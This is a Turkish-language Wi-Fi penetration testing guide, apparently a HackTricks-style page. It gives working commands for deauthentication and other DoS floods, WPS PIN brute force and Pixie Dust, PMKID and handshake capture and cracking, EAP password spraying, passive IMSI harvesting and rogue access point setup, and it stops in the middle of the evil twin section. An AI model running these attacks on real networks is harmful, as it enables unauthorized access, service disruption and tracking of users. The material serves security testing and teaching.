Pentesting Wifi

Reading time: 36 minutes

Wifi temel komutlar

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Araçlar

Hijacker & NexMon (Android dahili Wi-Fi)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

airgeddon'ı docker ile çalıştırın

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

Kaynak: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

Evil Twin, KARMA ve Known Beacons saldırılarını gerçekleştirebilir ve ardından ağın gerçek şifresini elde etmek veya sosyal ağ kimlik bilgilerini ele geçirmek için bir phishing şablonu kullanabilir.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Bu araç WPS/WEP/WPA-PSK saldırılarını otomatikleştirir. Otomatik olarak şunları yapar:

• Arayüzü monitor mode'a geçirir
• Olası ağlar için tarama yapar - ve hedef(leri) seçmenize izin verir
• Eğer WEP ise - WEP saldırılarını başlatır
• Eğer WPA-PSK ise
• Eğer WPS: Pixie dust attack ve bruteforce attack (dikkat: brute-force attack uzun sürebilir). Null PIN veya database/generated PINs denemediğini unutmayın.
• AP'ten PMKID yakalamaya çalışır (kırmak için)
• Handshake yakalamak için AP client'larını deauthenticate etmeye çalışır
• PMKID veya Handshake varsa, top5000 parolalar ile bruteforce denemeye çalışır.

Saldırı Özeti

• DoS
• Deauthentication/disassociation -- Herkesi (veya belirli bir ESSID/Client) bağlantısından ayırır
• Random fake APs -- Ağları gizleme, tarayıcıların çökmesine sebep olma olasılığı
• Overload AP -- AP'yi kapatmayı/öldürmeyi dener (genellikle çok faydalı değil)
• WIDS -- IDS ile oynama
• TKIP, EAPOL -- Bazı AP'lere DoS yapmak için belirli saldırılar
• Cracking
• Crack WEP (çeşitli araçlar ve yöntemler)
• WPA-PSK
• WPS pin "Brute-Force"
• WPA PMKID bruteforce
• [DoS +] WPA handshake capture + Cracking
• WPA-MGT
• Username capture
• Bruteforce Credentials
• Evil Twin (with or without DoS)
• Open Evil Twin [+ DoS] -- captive portal creds'i yakalamak ve/veya LAN saldırıları gerçekleştirmek için kullanışlı
• WPA-PSK Evil Twin -- Parolayı biliyorsanız ağ saldırıları için kullanışlı
• WPA-MGT -- Şirket kimlik bilgilerini yakalamak için kullanışlı
• KARMA, MANA, Loud MANA, Known beacon
• + Open -- captive portal creds'i yakalamak ve/veya LAN saldırıları gerçekleştirmek için kullanışlı
• + WPA -- WPA handshakes yakalamak için kullanışlı

DOS

Deauthentication Packets

Açıklama here:.

Deauthentication saldırıları, Wi-Fi hacking'te yaygın bir yöntem olup, "management" frameleri taklit ederek cihazları ağdan zorla bağlantıdan kesmeyi içerir. Bu şifrelenmemiş paketler client'ları meşru ağdan geldiğine inandırır; bu da saldırganların cracking amaçlı WPA handshakes toplamasına veya ağ bağlantılarını sürekli olarak bozmasına imkan verir. Bu taktik, basitliği açısından ürkütücü olmakla birlikte yaygın olarak kullanılır ve ağ güvenliği için önemli sonuçlar doğurur.

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0 deauthentication anlamına gelir
• 1 gönderilecek deauths sayısıdır (isteğe bağlı olarak birden fazla gönderebilirsiniz); 0 bunları sürekli göndermek anlamına gelir
• -a 00:14:6C:7E:40:80 erişim noktasının (AP) MAC adresidir
• -c 00:0F:B5:34:30:30 deauthenticate edilecek istemcinin MAC adresidir; bu atlanırsa broadcast deauthentication gönderilir (her zaman çalışmayabilir)
• ath0 arayüz adıdır

Disassociation Packets

Disassociation packets, deauthentication packets'a benzer şekilde, Wi‑Fi ağlarında kullanılan bir yönetim çerçevesi türüdür. Bu paketler, bir cihaz (ör. dizüstü bilgisayar veya akıllı telefon) ile erişim noktası (AP) arasındaki bağlantıyı sonlandırmak için kullanılır. Disassociation ile deauthentication arasındaki temel ayrım kullanım senaryolarında yatar. Bir AP, deauthentication packets ile ağdan yetkisiz cihazları açıkça kaldırırken, disassociation packets genellikle AP kapatılırken , yeniden başlatılırken veya taşınırken gönderilir; bu da bağlı tüm düğümlerin bağlantısının kesilmesini gerektirir.

This attack can be performed by mdk4(mode "d"):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

mdk4 ile daha fazla DOS saldırısı

Detaylar için here.

ATTACK MODE b: Beacon Flooding

İstemcilere fake APs göstermek için beacon frames gönderir. Bu bazen network scanners'ı ve hatta drivers'ı çökertebilir!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

Menzil içindeki tüm erişilebilir Access Points (APs)'e authentication frames göndermek, özellikle çok sayıda istemci olduğunda bu AP'leri aşırı yükleyebilir. Bu yoğun trafik sistem kararsızlığına yol açarak bazı AP'lerin kilitlenmesine veya hatta yeniden başlatılmasına neden olabilir.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

Saldırı MODU p: SSID Probing and Bruteforcing

Probing Access Points (APs), bir SSID'nin düzgün şekilde açığa çıkıp çıkmadığını kontrol eder ve AP'nin menzilini doğrular. Bu teknik, wordlist ile veya wordlist olmadan bruteforcing hidden SSIDs ile birlikte kullanıldığında, gizlenmiş ağları tespit etmeye ve erişmeye yardımcı olur.

Saldırı MODU m: Michael Countermeasures Exploitation

Farklı QoS kuyruklarına rastgele veya kopya paketler göndermek, TKIP APs üzerinde Michael Countermeasures'ı tetikleyebilir ve bu da AP'nin bir dakikalığına kapatılmasına yol açar. Bu yöntem etkili bir DoS (Denial of Service) saldırı taktiğidir.

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Bir AP'yi EAPOL Start frames ile floodlamak, fake sessions oluşturur, AP'yi bunaltır ve meşru istemcilerin erişimini engeller. Alternatif olarak, fake EAPOL Logoff messages enjekte etmek istemcileri zorla bağlantıdan düşürür; her iki yöntem de ağ hizmetini etkili şekilde kesintiye uğratır.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: IEEE 802.11s mesh ağları için saldırılar

Mesh ağlarında bağlantı yönetimi ve yönlendirmeye yönelik çeşitli saldırılar.

ATTACK MODE w: WIDS Confusion

İstemcileri birden fazla WDS düğümüne veya sahte rogue AP'lere çapraz bağlamak, Saldırı Tespit ve Önleme Sistemleri'ni manipüle ederek karışıklık ve potansiyel sistem suistimali yaratabilir.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

A packet fuzzer featuring diverse packet sources and a comprehensive set of modifiers for packet manipulation.

Airggedon

Airgeddon önceki yorumlarda önerilen saldırıların çoğunu sunar:

WPS

WPS (Wi-Fi Protected Setup) cihazları bir yönlendiriciye bağlama sürecini basitleştirir, WPA veya WPA2 Personal ile şifrelenmiş ağlar için kurulum hızını ve kolaylığını artırır. Kolayca ele geçirilen WEP güvenliği için etkisizdir. WPS, iki yarıda doğrulanan 8 haneli bir PIN kullanır; kombinasyon sayısının sınırlı olması nedeniyle (11.000 olası) brute-force saldırılarına karşı savunmasızdır.

WPS Bruteforce

Bu işlemi gerçekleştirmek için 2 ana araç vardır: Reaver ve Bully.

• Reaver, WPS'ye karşı sağlam ve pratik bir saldırı olarak tasarlanmıştır ve çok çeşitli access points ve WPS uygulamaları üzerinde test edilmiştir.
• Bully is a new implementation of the WPS brute force attack, written in C. It has several advantages over the original reaver code: fewer dependencies, improved memory and cpu performance, correct handling of endianness, and a more robust set of options.

Saldırı, özellikle ilk dört rakamın açığa çıkması ve son rakamın checksum rolü sayesinde WPS PIN's vulnerability'den faydalanır; bu durum brute-force saldırısını kolaylaştırır. Ancak agresif saldırganların blocking MAC addresses gibi brute-force savunmaları, saldırıya devam etmek için MAC address rotation gerektirir.

Bully veya Reaver gibi araçlarla WPS PIN'i elde ettikten sonra, saldırgan WPA/WPA2 PSK'yı türetebilir ve böylece kalıcı ağ erişimi sağlar.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

Bu rafine yaklaşım, bilinen zayıflıkları kullanarak WPS PIN'lerini hedef alır:

1. Pre-discovered PINs: Belirli üreticilerin genellikle aynı WPS PIN'lerini kullandıkları bilindiğinden, bu üreticilere bağlı bilinen PIN'leri içeren bir veritabanı kullanın. Bu veritabanı, MAC-addresses'in ilk üç oktetini bu üreticiler için muhtemel PIN'lerle ilişkilendirir.
2. PIN Generation Algorithms: ComputePIN ve EasyBox gibi, AP'nin MAC-address'i bazında WPS PIN'lerini hesaplayan algoritmaları kullanın. Arcadyan algoritması ayrıca bir device ID gerektirir; bu da PIN oluşturma sürecine ek bir katman ekler.

WPS Pixie Dust attack

Dominique Bongard bazı Access Points (APs) üzerinde gizli kodların, yani nonces (E-S1 ve E-S2), oluşturulmasında bir zafiyet keşfetti. Bu nonces çözülebilirse, AP'nin WPS PIN'ini kırmak kolaylaşır. AP, PIN'i meşru olduğunu ve sahte (rogue) bir AP olmadığını kanıtlamak için özel bir kod (hash) içinde açığa vurur. Bu nonces'ler aslında WPS PIN'ini tutan "kasayı" açan "anahtarlar" gibidir. More on this can be found here.

Basitçe söylemek gerekirse, sorun şu ki bazı APs bağlantı süreci sırasında PIN'i şifrelemek için yeterince rastgele anahtarlar kullanmadı. Bu durum, PIN'in ağ dışından tahmin edilebilir hale gelmesine (offline brute force attack) yol açar.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Eğer cihazı monitor mode'a geçirmek istemiyorsanız veya reaver ve bully ile ilgili bir sorun yaşıyorsanız, OneShot-C deneyebilirsiniz. Bu araç monitor mode'a geçmeden Pixie Dust attack gerçekleştirebilir.

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

Bazı kötü tasarlanmış sistemler erişim için bir Null PIN (boş veya var olmayan bir PIN) kullanımına bile izin verir; bu oldukça sıra dışıdır. Araç Reaver, Bully'in aksine bu zafiyeti test edebilir.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Önerilen tüm WPS saldırıları airgeddon. kullanılarak kolayca gerçekleştirilebilir.

• 5 ve 6 size kendi PIN'inizi deneme imkanı verir (eğer varsa)
• 7 ve 8 Pixie Dust attack gerçekleştirir
• 13 size NULL PIN'i test etme imkanı verir
• 11 ve 12, seçili AP ile ilişkili PIN'leri mevcut veritabanlarından geri toplayacak ve ComputePIN, EasyBox ve isteğe bağlı olarak Arcadyan kullanarak olası PIN'leri üretecek (önerilir, neden olmasın?)
• 9 ve 10 tüm olası PIN'leri test edecek

WEP

Artık çok kırılmış ve neredeyse kullanılmıyor. Bilmeniz gereken: airgeddon bu tür korumaya saldırmak için "All-in-One" adında bir WEP seçeneğine sahip. Diğer birçok araç da benzer seçenekler sunuyor.

WPA/WPA2 PSK

PMKID

2018'de, hashcat revealed yeni bir saldırı yöntemi ortaya koydu; benzersiz çünkü sadece tek bir paket gerektiriyor ve hedef AP'ye bağlı herhangi bir istemcinin olmasına gerek yok — saldırgan ile AP arasındaki etkileşim yeterli.

Pek çok modern yönlendirici, association sırasında ilk EAPOL çerçevesine isteğe bağlı bir alan ekler; buna Robust Security Network denir. Bu, PMKID'yi içerir.

Orijinal gönderide açıklandığı gibi, PMKID bilinen veriler kullanılarak oluşturulur:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

"PMK Name" sabit olduğundan, AP ve station'ın BSSID'sini biliyor olmamız ve PMK'nin tam bir 4-way handshake'inkine özdeş olması nedeniyle, hashcat bu bilgiyi PSK'yı crack etmek ve passphrase'i kurtarmak için kullanabilir!

Bu bilgileri gather etmek ve şifreyi yerel olarak bruteforce etmek için şunu yapabilirsiniz:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

Yakalanan PMKIDs, console'da gösterilecek ve ayrıca _ /tmp/attack.pcap_ içine kaydedilecek.
Şimdi, yakalamayı hashcat/john formatına dönüştürün ve kırın:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Lütfen doğru bir hash formatının 4 parça içerdiğini unutmayın, örnek: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 Eğer sizinkiniz sadece 3 parça içeriyorsa, bu geçersizdir (PMKID yakalaması geçerli değildi).

Dikkat edin ki hcxdumptool ayrıca handshakes yakalar (şuna benzer bir şey görünecektir: MP:M1M2 RC:63258 EAPOLTIME:17091). cap2hccapx kullanarak handshakes'i hashcat/john formatına dönüştürebilirsiniz.

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

I have noticed that some handshakes captured with this tool couldn't be cracked even knowing the correct password. I would recommend to capture handshakes also via traditional way if possible, or capture several of them using this tool.

Handshake capture

Bir WPA/WPA2 ağına yapılacak saldırı, bir handshake yakalayarak ve password'ı offline olarak crack etmeye çalışarak gerçekleştirilebilir. Bu süreç, belirli bir ağın ve belirli bir BSSID'nin belirli bir channel üzerindeki iletişiminin izlenmesini gerektirir. İşte sadeleştirilmiş bir rehber:

1. Hedef ağın BSSID'sini, channel'ını ve bir connected client'ını belirleyin.
2. Belirtilen channel ve BSSID üzerinde ağ trafiğini izlemek ve bir handshake yakalamayı umarak airodump-ng kullanın. Komut şöyle görünecektir:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

3. Handshake yakalama şansını artırmak için, istemciyi kısa süreliğine ağdan çıkararak yeniden kimlik doğrulama zorlayın. Bu, istemciye deauthentication packets gönderen aireplay-ng komutu ile yapılabilir:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Client deauthenticated olduğunda farklı bir AP'ye veya bazı durumlarda farklı bir network'e bağlanmaya çalışabileceğini unutmayın.

Once in the airodump-ng appears some handshake information this means that the handshake was captured and you can stop listening:

Handshake yakalandıktan sonra aircrack-ng ile crack edebilirsiniz:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Dosyada handshake var mı

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Bu araç, tamamlanmış olandan önce bir ESSID'ye ait tamamlanmamış handshake bulursa, geçerli olanı tespit edemez.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Enterprise (MGT)

Kurumsal WiFi kurulumlarında çeşitli kimlik doğrulama yöntemleriyle karşılaşacaksınız, her biri farklı güvenlik seviyeleri ve yönetim özellikleri sağlar. Ağ trafiğini incelemek için airodump-ng gibi araçları kullandığınızda, bu kimlik doğrulama türlerine ait tanımlayıcıları fark edebilirsiniz. Bazı yaygın yöntemler şunlardır:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• Bu yöntem EAP-PEAP içinde donanım tokenlarını ve tek kullanımlık parolaları destekler. MSCHAPv2'nin aksine peer challenge kullanmaz ve parolaları erişim noktasına düz metin olarak gönderir; bu durum downgrade saldırıları için risk oluşturur.

2. EAP-MD5 (Message Digest 5):

• İstemciden parolanın MD5 hash'inin gönderilmesini içerir. Sözlük saldırılarına karşı savunmasız olması, sunucu kimlik doğrulamasının olmaması ve oturuma özgü WEP anahtarları üretememesi nedeniyle önerilmez.

3. EAP-TLS (Transport Layer Security):

• Kimlik doğrulama için hem istemci hem de sunucu tarafı sertifikalarını kullanır ve iletişimi güvence altına almak için kullanıcı tabanlı ve oturum tabanlı dinamik WEP anahtarları üretebilir.

4. EAP-TTLS (Tunneled Transport Layer Security):

• Şifreli bir tünel aracılığıyla karşılıklı kimlik doğrulama sağlar ve dinamik, kullanıcı başına, oturum başına WEP anahtarları türetmek için bir yöntem sunar. Sadece sunucu tarafı sertifikaları gerektirir; istemciler kimlik bilgilerini kullanır.

5. PEAP (Protected Extensible Authentication Protocol):

• TLS tüneli oluşturarak korumalı iletişim sağlar; tünelin sunduğu koruma sayesinde EAP üzerinde daha zayıf kimlik doğrulama protokollerinin kullanılmasına izin verir.
• PEAP-MSCHAPv2: Genellikle PEAP olarak anılır; savunmasız MSCHAPv2 challenge/response mekanizmasını koruyucu bir TLS tüneliyle birleştirir.
• PEAP-EAP-TLS (or PEAP-TLS): EAP-TLS'ye benzer ancak sertifikalar değiş tokuş edilmeden önce bir TLS tüneli başlatır ve ek bir güvenlik katmanı sunar.

Bu kimlik doğrulama yöntemleri hakkında daha fazla bilgiyi buradan ve buradan bulabilirsiniz.

Kullanıcı Adı Yakalama

Reading https://tools.ietf.org/html/rfc3748#page-27 it looks like if you are using EAP the "Identity" messages must be supported, and the username is going to be sent in clear in the "Response Identity" messages.

Even using one of the most secure of authentication methods: PEAP-EAP-TLS, it is possible to capture the username sent in the EAP protocol. To do so, capture a authentication communication (start airodump-ng inside a channel and wireshark in the same interface) and filter the packets byeapol.
Inside the "Response, Identity" packet, the username of the client will appear.

Anonymous Identities

Identity hiding is supported by both EAP-PEAP and EAP-TTLS. In the context of a WiFi network, an EAP-Identity request is typically initiated by the access point (AP) during the association process. To ensure the protection of user anonymity, the response from the EAP client on the user's device contains only the essential information required for the initial RADIUS server to process the request. This concept is illustrated through the following scenarios:

• EAP-Identity = anonymous
• In this scenario, all users employ the pseudonymous "anonymous" as their user identifier. The initial RADIUS server functions as either an EAP-PEAP or EAP-TTLS server, responsible for managing the server-side of the PEAP or TTLS protocol. The inner (protected) authentication method is then either handled locally or delegated to a remote (home) RADIUS server.
• EAP-Identity = anonymous@realm_x
• In this situation, users from different realms conceal their identities while indicating their respective realms. This allows the initial RADIUS server to proxy the EAP-PEAP or EAP-TTLS requests to RADIUS servers in their home realms, which act as the PEAP or TTLS server. The initial RADIUS server operates solely as a RADIUS relay node.
• Alternatively, the initial RADIUS server may function as the EAP-PEAP or EAP-TTLS server and either handle the protected authentication method or forward it to another server. This option facilitates the configuration of distinct policies for various realms.

In EAP-PEAP, once the TLS tunnel is established between the PEAP server and the PEAP client, the PEAP server initiates an EAP-Identity request and transmits it through the TLS tunnel. The client responds to this second EAP-Identity request by sending an EAP-Identity response containing the user's true identity through the encrypted tunnel. This approach effectively prevents the revelation of the user's actual identity to anyone eavesdropping on the 802.11 traffic.

EAP-TTLS follows a slightly different procedure. With EAP-TTLS, the client typically authenticates using PAP or CHAP, secured by the TLS tunnel. In this case, the client includes a User-Name attribute and either a Password or CHAP-Password attribute in the initial TLS message sent after tunnel establishment.

Regardless of the protocol chosen, the PEAP/TTLS server obtains knowledge of the user's true identity after the TLS tunnel has been established. The true identity can be represented as user@realm or simply user. If the PEAP/TTLS server is also responsible for authenticating the user, it now possesses the user's identity and proceeds with the authentication method protected by the TLS tunnel. Alternatively, the PEAP/TTLS server may forward a new RADIUS request to the user's home RADIUS server. This new RADIUS request omits the PEAP or TTLS protocol layer. In cases where the protected authentication method is EAP, the inner EAP messages are transmitted to the home RADIUS server without the EAP-PEAP or EAP-TTLS wrapper. The User-Name attribute of the outgoing RADIUS message contains the user's true identity, replacing the anonymous User-Name from the incoming RADIUS request. When the protected authentication method is PAP or CHAP (supported only by TTLS), the User-Name and other authentication attributes extracted from the TLS payload are substituted in the outgoing RADIUS message, displacing the anonymous User-Name and TTLS EAP-Message attributes found in the incoming RADIUS request.

For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X can leak the permanent subscriber identifier (IMSI) in cleartext during the unauthenticated identity phase if the deployment doesn’t implement pseudonyms/protected identities or a TLS tunnel around the inner EAP.

Where the leak happens (high level):

• 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
• Authenticator sends EAP-Request/Identity.
• Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
• Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
• Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

# 1) Enable monitor mode
airmon-ng start wlan0

# 2) Optional: lock channel to the target BSS
airodump-ng wlan0mon --essid <SSID>

# 3) Capture 802.1X/EAP frames
# Wireshark display filters:
#   eap || eapol
#   (identity specifically): eap.code == 2 && eap.type == 1
# Kismet: add source wlan0mon; enable 802.1X/EAP views
# tcpdump (pcap capture):
#   tcpdump -i wlan0mon -s 0 -w eapsim_identity.pcap

# 4) Wait for a device to auto-connect to the SSID
# 5) Inspect the first EAP-Response/Identity frame
# Expected: ASCII NAI containing IMSI, e.g.
#   20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org

Notlar:

• Dağıtım, korumalı kimlik/takma adlar olmadan çıplak EAP‑SIM/AKA kullanıyorsa herhangi bir TLS tünelinden önce çalışır.
• Ortaya çıkan değer, abonenin SIM'ine bağlı kalıcı bir tanımlayıcıdır; toplama, uzun vadeli izleme ve sonraki telekom suistimallerine olanak tanır.

Etkiler

• Gizlilik: halka açık yerlerde pasif Wi‑Fi yakalamalarından kaynaklanan kalıcı kullanıcı/cihaz takibi.
• Telekom suistimali başlangıcı: IMSI ile SS7/Diameter erişimi olan bir saldırgan konum sorgulayabilir veya çağrı/SMS dinleme ve MFA hırsızlığı girişiminde bulunabilir.

Önlemler / dikkat edilecekler

• İstemcilerin 3GPP rehberliğine göre (ör. 3GPP TS 33.402) EAP‑SIM/AKA için anonim dış kimlikler (takma adlar) kullandığını doğrulayın.
• Kimlik aşamasını tünellemeyi tercih edin (ör. içte EAP‑SIM/AKA taşıyan EAP‑TTLS/PEAP) böylece IMSI asla açıkta gönderilmez.
• Association/auth paket yakalamaları EAP-Response/Identity içinde ham bir IMSI ifşa etmemelidir.

İlgili: Yakalanan mobil kimliklerle telekom sinyalleme istismarı Telecom Network Exploitation

EAP-Bruteforce (password spray)

Eğer istemcinin bir kullanıcı adı ve parola kullanması bekleniyorsa (bu durumda EAP-TLS geçerli olmayacaktır), bir kullanıcı adları listesi (bkz. sonraki bölüm) ve parolalar elde etmeye çalışabilir ve erişimi air-hammer kullanarak bruteforce etmeyi deneyebilirsiniz.

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

Bu saldırıyı ayrıca eaphammer kullanarak da gerçekleştirebilirsiniz:

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

İstemci Saldırıları Teorisi

Ağ Seçimi ve Roaming

• 802.11 protokolü bir istasyonun Extended Service Set (ESS) içine nasıl katılacağını tanımlar, ancak bir ESS veya içindeki bir access point (AP) seçme kriterlerini belirtmez.
• İstasyonlar aynı ESSID'i paylaşan AP'ler arasında roam edebilir, bir bina veya alan içinde bağlantıyı koruyabilirler.
• Protokol, istasyonun ESS'e karşı kimlik doğrulamasını gerektirir, ancak AP'nin istasyona karşı kimlik doğrulamasını zorunlu kılmaz.

Preferred Network Lists (PNLs)

• İstasyonlar bağlandıkları her kablosuz ağın ESSID'ini, ağ-a özgü yapılandırma detaylarıyla birlikte Tercih Edilen Ağ Listesi (PNL) içinde saklar.
• PNL, bilinen ağlara otomatik bağlanmak için kullanılır ve böylece bağlantı sürecini kolaylaştırarak kullanıcı deneyimini iyileştirir.

Passive Scanning

• AP'ler periyodik olarak beacon frame'leri yayınlayarak varlıklarını ve özelliklerini duyurur; yayın kapatılmadığı sürece AP'nin ESSID'i de dahil edilir.
• Pasif tarama sırasında istasyonlar beacon frame'lerini dinler. Bir beacon'ın ESSID'i istasyonun PNL'indeki bir girişle eşleşirse, istasyon otomatik olarak o AP'ye bağlanabilir.
• Bir cihazın PNL bilgisinin bilinmesi, bilinen bir ağın ESSID'ini taklit ederek cihazı sahte bir AP'ye bağlamaya kandırmak gibi istismar imkanları sağlar.

Active Probing

• Aktif probing, istasyonların yakınlardaki AP'leri ve özelliklerini keşfetmek için probe request'ler göndermesini içerir.
• Yönlendirilmiş probe request'ler belirli bir ESSID'i hedefler; bu, ağ gizli olsa bile belirli bir ağın menzil içinde olup olmadığını tespit etmeye yardımcı olur.
• Broadcast probe request'lerin SSID alanı null'dır ve tüm yakın AP'lere gönderilir; böylece istasyon PNL içeriğini açığa çıkarmadan herhangi bir tercih edilen ağı kontrol edebilir.

Basit AP ve İnternete Yönlendirme

Daha karmaşık saldırıların nasıl gerçekleştirileceğini açıklamadan önce, sadece bir AP oluşturmanın ve trafiğini İnternete bağlı bir arayüze nasıl yönlendireceğimizin açıklanması gerekecek.

Using ifconfig -a check that the wlan interface to create the AP and the interface connected to the Internet are present.

DHCP & DNS

apt-get install dnsmasq #Manages DHCP and DNS

Konfigürasyon dosyasını oluşturun /etc/dnsmasq.conf:

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Sonra IPs ve routes ayarlayın:

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Ve sonra dnsmasq'ı başlatın:

dnsmasq -C dnsmasq.conf -d

hostapd

apt-get install hostapd

Bir yapılandırma dosyası oluşturun hostapd.conf:

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

Rahatsız edici işlemleri durdurun , monitor mode'u ayarlayın ve hostapd'i başlatın:

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

Yönlendirme ve Yeniden Yönlendirme

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Evil Twin

An evil twin attack, WiFi istemcilerinin ağları tanıma şeklinden yararlanır; esas olarak ağ adına (ESSID) dayanır ve base station (access point)'in istemciye kimlik doğrulaması yapmasını gerektirmez. Önemli noktalar şunlardır:

• Ayrım Yapma Zorluğu: Cihazlar aynı ESSID ve şifreleme türünü paylaştıklarında meşru ve sahte access point'leri ayırt etmekte zorlanır. Gerçek dünyadaki ağlar genellikle kapsama alanını sorunsuz genişletmek için aynı ESSID'yi kullanan birden fazla access point kullanır.
